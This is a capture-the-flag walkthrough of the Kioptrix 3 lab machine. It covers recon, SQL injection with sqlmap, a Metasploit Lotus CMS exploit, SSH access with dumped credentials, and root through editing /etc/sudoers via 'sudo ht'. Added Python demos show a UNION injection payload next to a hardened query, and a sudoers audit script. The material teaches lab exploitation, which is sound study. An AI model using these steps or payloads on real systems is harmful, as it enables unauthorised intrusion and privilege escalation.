Kioptrix 3

Kioptrix 1.2 #3

Initial Info

Make sure to point the hosts file on your Kali box at the machine's IP.

nano /etc/hosts

Add a line with the Kioptrix IP followed by the hostname kioptrix3.com.

Then, just to be sure, ping kioptrix3.com to confirm the name resolves to the right address.

Recon

Scanned Target with nmap.

nmap -p- -sV ipaddress

Found ports 22 and 80 open, so we have a web server and SSH available. Unless SSH is a really old version or looks funky I'll most likely skip it. Port 80 brings us to a web page; clicking around the links you can find a login page that says "powered by Lotus CMS", so we need to Google Lotus CMS and research known vulnerabilities for it. Reading the site's blog posts we find a mention of a gallery app that was recently implemented. A nikto scan run alongside nmap also turned up a phpMyAdmin directory. Let's see what we know so far:

  • Apache server on port 80
  • Lotus CMS, version not yet known
  • There is a blog post with some handy enumeration info
  • The post leads us to the freshly implemented gallery app
  • Clicking around the gallery app you can see /gallery/gallery.php?id=1, so it's talking to a database
  • phpMyAdmin directory found via nikto

From this list I know to Google Lotus CMS vulnerabilities, and I immediately find an exploit that looks promising.

While looking into that I ran sqlmap against http://ipaddress/gallery/gallery.php?id=1 to see whether it finds any injection, and it ends up dumping the entire database, including two users and their passwords.
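To show why a parameter like gallery.php?id=1 hands sqlmap the whole database, here is an added example (not code from the original walkthrough or from the Kioptrix box) that recreates the bug against an in-memory SQLite database. The schema, table names (gallery, dev_accounts) and credentials are constructed for the demo and are not the real box's data. It walks the same road sqlmap does: confirm the column count with ORDER BY, then UNION a second SELECT onto the numeric id, and it puts the hardened lookup beside the vulnerable one.

```python
import sqlite3

# Constructed stand-in for the CMS database behind gallery.php?id=1.
# Table and column names are assumptions for this example, not taken from
# the real Kioptrix 3 database; the credentials are placeholders.
SCHEMA = """
CREATE TABLE gallery (id INTEGER PRIMARY KEY, title TEXT, filename TEXT);
CREATE TABLE dev_accounts (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO gallery VALUES (1, 'Lobby', 'lobby.jpg');
INSERT INTO gallery VALUES (2, 'Server room', 'rack.jpg');
INSERT INTO dev_accounts VALUES (1, 'alice', 'hash-of-alice-password');
INSERT INTO dev_accounts VALUES (2, 'bob', 'hash-of-bob-password');
"""


def open_db():
    """In-memory database loaded with the constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(conn, id_param):
    """What a naive gallery.php does: paste ?id= straight into the query.
    The id is numeric, so there is no quote to close; anything after the
    number is parsed as SQL."""
    query = "SELECT title, filename FROM gallery WHERE id = " + id_param
    return conn.execute(query).fetchall()


def safe_lookup(conn, id_param):
    """Hardened form: reject anything that is not a plain integer, then bind
    the value as a parameter so the driver never treats it as SQL."""
    if not id_param.isdigit():
        return []
    query = "SELECT title, filename FROM gallery WHERE id = ?"
    return conn.execute(query, (int(id_param),)).fetchall()


def count_columns(conn, limit=20):
    """Manual tester's first step: ORDER BY n errors out once n exceeds the
    number of columns the original SELECT returns."""
    for n in range(1, limit + 1):
        try:
            vulnerable_lookup(conn, f"1 ORDER BY {n}")
        except sqlite3.OperationalError:
            return n - 1
    return None


def union_dump(conn, table, col_a, col_b):
    """Two-column UNION payload: id=0 matches no real gallery row, so every
    row that comes back belongs to the injected SELECT."""
    payload = f"0 UNION ALL SELECT {col_a}, {col_b} FROM {table}"
    return dict(vulnerable_lookup(conn, payload))


if __name__ == "__main__":
    db = open_db()
    print("columns in original SELECT:", count_columns(db))
    print("dumped via UNION:", union_dump(db, "dev_accounts", "username", "password"))
    payload = "0 UNION ALL SELECT username, password FROM dev_accounts"
    print("same payload against the hardened lookup:", safe_lookup(db, payload))
```

The point of the two functions side by side is that nothing in the payload is exotic: a numeric id without parameter binding is all it takes, and the fix is binding plus input validation, not escaping quotes.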

Local

Even though sqlmap gave me two users and passwords, I was curious whether the Lotus CMS exploit worked. I loaded Metasploit and tested it. It didn't work, but why? It should have. Looking closer, the exploit's URI option needs to point at the webroot / since that is where the CMS framework is hosted. Rerunning the exploit gave me a meterpreter session as the web server user. I poked around and found several interesting things, but I also wanted to see if I could SSH in as the users I found.

ssh loneferret@192.168.100.200

Awesome, the password works, so we have local access both as the web server user and as a real local user. Time for more enumeration! Let's find a way to get root.

Priv Esc

Started looking through the user loneferret's home folder. I found a text file telling all users to use sudo ht, or else. What is ht?

Googling it, ht is a hex editor. It doesn't need a vulnerability of its own: any editor that runs as root through sudo can write any file on the box.

sudo ht /etc/sudoers

Cool, I can edit files as root.

There is a !/usr/bin/su entry in the sudoers file, but editing that entry to allow su gets me nowhere. Using the command below

which su

we can see that su actually lives at /bin/su, so the sudoers entry names a path that doesn't exist on this box and sudo never matches it. Edit the sudoers file to allow /bin/su instead, keeping the change minimal (ht does no syntax checking the way visudo does, and a broken sudoers file locks you out of sudo entirely), then try again.

And root!
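The rule on this box fails in two separate ways: it hands a user a root-running editor with NOPASSWD, and it tries to "subtract" su with a ! entry that points at the wrong path (the sudoers manual itself warns that subtracting commands with ! is not effective, because a copy of the binary anywhere else is not matched). As an added example, not code from the walkthrough or the box, here is a small Python audit that spots both problems in a sudoers rule of this shape. The sample rule is constructed to match the description above (ht allowed, su denied) and is an assumption, not the real line from the box; the parser handles single-user rules only, with no aliases, Defaults lines or host lists. On the target itself, sudo -l prints the rules that apply to you without touching /etc/sudoers.

```python
import os
import re
import shutil

# Constructed sudoers rule in the shape the walkthrough describes. The exact
# contents of the box's real sudoers file are not known here; this is an
# assumption for the example.
SAMPLE_RULE = "loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht"

# Programs that give a root shell or arbitrary root file writes when run
# through sudo (editors, pagers, interpreters). ht is here because it is an
# editor; the list is illustrative, not exhaustive.
SHELL_ESCAPE_BINARIES = {"ht", "vi", "vim", "nano", "less", "more",
                         "find", "awk", "perl", "python"}


def parse_rule(line):
    """Parse 'user hosts=(runas) TAG: cmd, !cmd' into a dict.
    Reduced grammar: one user, no aliases, no Defaults lines."""
    user, _, rest = line.strip().partition(" ")
    hosts, _, spec = rest.partition("=")
    spec = spec.strip()
    runas = None
    if spec.startswith("("):
        runas, _, spec = spec[1:].partition(")")
        spec = spec.strip()
    tags = set()
    m = re.match(r"((?:[A-Z]+:\s*)+)", spec)
    if m:
        tags = {t.strip() for t in m.group(1).split(":") if t.strip()}
        spec = spec[m.end():]
    entries = []
    for item in spec.split(","):
        item = item.strip()
        if not item:
            continue
        # first token is the command path; anything after it is an argument spec
        entries.append((item.startswith("!"), item.lstrip("!").split()[0]))
    return {"user": user, "hosts": hosts.strip(), "runas": runas,
            "tags": tags, "entries": entries}


def audit_rule(line, resolver=None):
    """Return (code, path) findings for one rule. `resolver` maps a command
    name to where it really lives; defaults to a PATH lookup on this host."""
    resolver = resolver or shutil.which
    rule = parse_rule(line)
    findings = []
    if "NOPASSWD" in rule["tags"]:
        findings.append(("NOPASSWD", None))
    for negated, path in rule["entries"]:
        if path == "ALL":
            findings.append(("ALL_COMMANDS", path))
            continue
        name = os.path.basename(path)
        if not negated and name in SHELL_ESCAPE_BINARIES:
            # an editor as root can rewrite /etc/sudoers, /etc/passwd, ...
            findings.append(("EDITOR_AS_ROOT", path))
        real = resolver(name)
        if real and real != path:
            # sudo matches the full path; a rule for a path that does not
            # exist on the box never fires, whether it allows or denies
            findings.append(("PATH_MISMATCH", path))
        if negated:
            # '!' only subtracts from something already granted, and even
            # then a copy of the binary under another path is not covered
            findings.append(("NEGATION_INEFFECTIVE", path))
    return findings


if __name__ == "__main__":
    # constructed resolver standing in for `which` on the target
    where = {"su": "/bin/su", "ht": "/usr/local/bin/ht"}.get
    for code, path in audit_rule(SAMPLE_RULE, resolver=where):
        print(f"{code:22} {path or ''}")
```

Run against the sample rule it reports NOPASSWD, EDITOR_AS_ROOT for ht, and both PATH_MISMATCH and NEGATION_INEFFECTIVE for the su entry, which is exactly the combination that turns sudo ht into root here.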

Lessons Learned

Always read home directories.

Process of elimination is your friend.